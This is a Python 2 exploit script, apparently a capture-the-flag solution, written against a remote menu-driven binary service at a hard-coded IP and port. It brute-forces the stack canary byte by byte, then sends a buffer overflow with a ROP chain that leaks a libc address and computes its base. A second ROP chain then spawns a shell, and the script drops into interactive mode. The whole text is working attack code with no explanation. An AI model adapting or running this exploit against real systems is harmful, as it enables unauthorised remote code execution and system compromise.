from codez import * r = Remote('127.0.0.1',1234) r = Remote('54.178.148.88',8888) r.read('S') r.read(':') def equal(iterator): return len(set(iterator)) <= 1 def randoms(s): import random,string r = [ random.choice(string.lowercase) for _ in range(s)] return ''.join(r) raw_input('x') canary = [chr(0) for i in xrange(8)] for k in range(1,8): possible = [1000 for x in xrange(256)] for i in range(0x1,0x100): canary[k] = chr(i) if i == 0xa or i == 0x9c: continue payload = "\0\0\0" payload += "".join(canary[:k+1]) payload = payload * (500/len(payload)) payload += randoms(500 - len(payload)) + "\n" r.sendline('2') r.read(':') r.sendline(str(505+k+1)) r.read(':') r.write(payload) x=r.read(':').strip() s=int(x.split(' ')[0]) possible[i] = s value = min(possible) canary[k] = (chr(possible.index(value))) print 'canary' cookie = ''.join(canary) print hex(unpack('Q',cookie)[0]) raw_input('wait') r.sendline('1') rop = pack('QQQQ',0x400fb3,0x602018,0x400870,0x400980) r.read(':') r.sendline(str(512 + 8 + len(rop))) r.read(':') r.write('X'*504 +cookie +'B'*8 + rop) x=unpack('Q',r.read('S')[1:7]+"\x00\x00")[0]-0x6FE30 #0x6beb0 print hex(x) raw_input('dbg') rop = pack('QQQ',0x400fb3,0x17CCDB+x,x+0x46640) r.read(':') r.sendline('1') r.read(':') r.sendline('1') r.sendline(str(512 + 8 + len(rop))) r.read(':') r.write('X'*504 +cookie +'B'*8 + rop) r.interactive() raw_input('wait') 1